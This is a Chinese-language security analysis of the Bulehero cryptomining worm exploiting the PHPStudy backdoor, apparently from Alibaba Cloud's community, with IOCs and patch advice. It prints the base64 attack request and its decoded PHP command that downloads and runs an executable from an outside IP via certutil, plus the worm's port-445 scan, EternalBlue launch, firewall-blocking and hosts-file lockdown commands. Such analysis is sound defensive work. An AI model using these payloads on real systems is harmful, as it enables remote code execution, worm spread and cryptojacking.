概述
背景介绍
Bulehero
Bulehero挖矿蠕虫最早出现于2018年初,初次曝光于2018年8月,因最早使用bulehero.in域名被命名为Bulehero。
该蠕虫专注于攻击Windows服务器,通过植入恶意挖矿软件进行牟利。它使用多种复杂的攻击方式进行传播,自出现后更新频繁,不断的将新的攻击方式加入自己的武器库。
PHPStudy后门漏洞
PHPStudy是国内的一款免费的PHP调试环境的程序集成包,在国内有着近百万的PHP语言学习者和开发者用户。在2019年9月20日,网上爆出PHPStudy存在“后门”:黑客早在2016年就编写了“后门”文件,并非法侵入了PHPStudy的官网,篡改了软件安装包植入“后门”。该“后门”具有远程控制计算机的功能,可以远程控制下载运行脚本实现用户个人信息收集。据报道黑客利用该漏洞共非法控制计算机67万余台,非法获取大量账号密码类、聊天数据类、设备码类等数据10万余组。该“后门”除了会造成挖矿和信息泄露,还有可能被勒索病毒利用,服务器关键数据被勒索病毒加密后将无法找回,给被害者造成大量的数据、经济损失。
蠕虫分析
攻击行为分析
GET /index.PHP HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7 Accept-Encoding: gzip,deflate Accept-Language: zh-cn Referer: http://xxx:80/index.PHP User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: xxx
解码后内容:
system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %systemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %systemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('PHPstudy');
被感染主机行为
-
挖矿模块:该模块进行门罗币的挖矿,Bulehero在该版本中并未使用公共矿池进行挖矿,改用自建的矿池代理进行挖矿任务分发,因此可以避免暴露钱包地址,防止安全研究人员的跟踪。
-
扫描模块:该模块会扫描互联网的特定开放端口,并将扫描结果写入到名为Result.txt的文件中
C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445
-
攻击模块: 该模块集成多种漏洞利用工具,读取扫描结果并攻击其他主机,如下进程是其使用永恒之蓝漏洞模块进行攻击。
C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
-
其他行为 使用netsh ipsec安全工具,阻断存在漏洞的服务端口,防止其他竞争者进入。
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP netsh ipsec static add filteraction name=BastardsList action=block
修改主机host防止其他竞争者劫持域名。
cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYstem
时间线
其他攻击方式
IOCs
60[.]164[.]250[.]170
185[.]147[.]34[.]136
fky[.]dfg45dfg45[.]best
uu[.]dfg45dfg45[.]best
uu1[.]dfg45dfg45[.]best
ox[.]mygoodluck[.]best
oo[.]mygoodluck[.]best
安全建议
-
企业需要对涉及的漏洞及时修复,否则容易成为挖矿木马的受害者。
本文作者:桑铎
原文链接
本文为云栖社区原创内容,未经允许不得转载。